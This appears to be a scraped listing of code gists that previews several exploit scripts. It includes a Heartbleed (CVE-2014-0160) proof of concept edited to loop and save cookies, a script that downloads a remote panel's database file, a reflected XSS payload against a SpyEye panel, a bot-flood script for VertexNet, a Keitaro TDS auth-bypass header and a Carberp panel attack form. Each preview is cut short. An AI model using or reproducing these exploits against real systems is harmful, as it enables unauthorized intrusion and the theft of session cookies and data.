This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
def StrToHex(string): | |
hex_str='' | |
for char in string: | |
int_char = ord(char) | |
hex_num = hex(int_char).lstrip("0x") | |
hex_str+=hex_num | |
return hex_str |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
# VertexNet v1.1.1 Flood Bots | |
# http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791 | |
# Xyl2k! :þ | |
use HTTP::Request; | |
use LWP::UserAgent; | |
$URL = "http://localhost/Panel/adduser.php"; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<pre> | |
<?php | |
$url = getURL(); | |
if ($url !== NULL) { | |
$database = @file_get_contents($url . '/db/database.db'); | |
if ($database !== FALSE) { | |
file_put_contents('tmp.db', $database); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
# The author disclaims copyright to this source code. | |
# Edited spl0it to loop and save cookies. | |
import sys | |
import struct | |
import socket | |
import time |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# SpyEye version ? reflected XSS POC | |
# Xartrick | |
# Xylitol | |
import urllib | |
import urllib2 | |
# Configuration ... | |
sPayload = '<script>alert(1);</script>' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Xyl2k :þ | |
// Thanks to EsSandre for the additional help. | |
$MySQLI = array(); | |
/* MySQLI ID */ | |
$MySQLI['HOST'] = 'localhost'; | |
$MySQLI['USER'] = 'root'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function decode($data, $key) { | |
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, ''); | |
$iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND); | |
mcrypt_generic_init($td, $key, $iv); | |
mcrypt_generic($td, $data); | |
$data = mdecrypt_generic($td, $data); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* Defeat the weak hash function of Rovnix | |
* to get password from a hash. | |
*/ | |
$HASH = 'fbff791ef0770855e599ea6f87d41653'; | |
$value = getNumber($HASH); | |
$search = search($value, $HASH); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
____/\_____/\____/\____/\____/\____/\____/\__/\____/\____/\ | |
/ ___/ / / - _/ __ / __ / ___/ __ / / / ___/\ | |
/ / /__ __/ - / _/_/ _/ / / _/ / / / / _/__\/ | |
/_____/ /___//_____/_____/__/__/_____/__/__/___/_/_/_/_____/\nf! | |
\_____\/\___\\_____\_____\__\__\_____\__\__\___\_\_\_\_____\/ | |
C Y B E R C R i M E W H Q | |
Keitaro TDS Auth bypass v6.x - v7.7.10 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<table width="607" border="0"> | |
<tr> | |
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>"> | |
<label for="carberp">Domain: </label> | |
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" /> | |
<input type="submit" name="button" id="button" value="Ownz !" /> | |
</form></td> | |
</tr> | |
<tr> | |
<td><?php |
OlderNewer